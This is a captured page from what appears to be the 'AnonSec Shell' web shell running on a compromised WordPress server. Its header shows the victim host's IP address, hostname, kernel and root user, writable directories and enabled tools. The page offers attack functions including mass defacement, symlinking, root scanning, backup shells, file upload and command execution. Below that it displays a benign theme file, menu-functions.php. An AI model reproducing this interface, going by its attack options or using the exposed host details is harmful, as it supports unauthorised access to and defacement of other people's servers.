AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.145.204.107   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/chroot/var/www/wp-content/themes/CubicWP/inc/functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/chroot/var/www/wp-content/themes/CubicWP/inc/functions/menu-functions.php
<?php
/**
* Menu Functions
*
* @package ListMode WordPress Theme
* @copyright Copyright (C) 2024 ThemesDNA
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
* @author ThemesDNA <[email protected]>
*/

class ListMode_Menus {

    private static $instance;

    public function __construct() {
        add_action('wp_page_menu_args', array($this, 'page_menu_args'));
        add_filter('wp_nav_menu_args', array($this, 'nav_menu_args'));
    }

    public static function get_instance() {
        if (null === self::$instance) {
            self::$instance = new self();
        }
        return self::$instance;
    }

    // Get our wp_nav_menu() fallback, wp_page_menu(), to show a "Home" link as the first item
    public function page_menu_args($args) {
        $args['show_home'] = true;
        return $args;
    }

    public function primary_menu_text() {
        $menu_text = esc_html__( 'Menu', 'listmode' );
        if ( listmode_get_option('primary_menu_text') ) {
            $menu_text = listmode_get_option('primary_menu_text');
        }
        return apply_filters( 'listmode_primary_menu_text', $menu_text );
    }

    public function primary_fallback_menu() {
        wp_page_menu( array(
            'sort_column'  => 'menu_order, post_title',
            'menu_id'      => 'listmode-menu-primary-navigation',
            'menu_class'   => 'listmode-primary-nav-menu listmode-menu-primary',
            'container'    => 'ul',
            'echo'         => true,
            'link_before'  => '',
            'link_after'   => '',
            'before'       => '',
            'after'        => '',
            'item_spacing' => 'discard',
            'walker'       => '',
        ) );
    }

    public function nav_menu_args($args) {
        if ($args['theme_location'] === 'primary' && empty($args['menu'])) {
            $args['fallback_cb'] = array($this, 'primary_fallback_menu');
        }
        return $args;
    }

}
// Initialize the instance
ListMode_Menus::get_instance();

Anon7 - 2022
AnonSec Team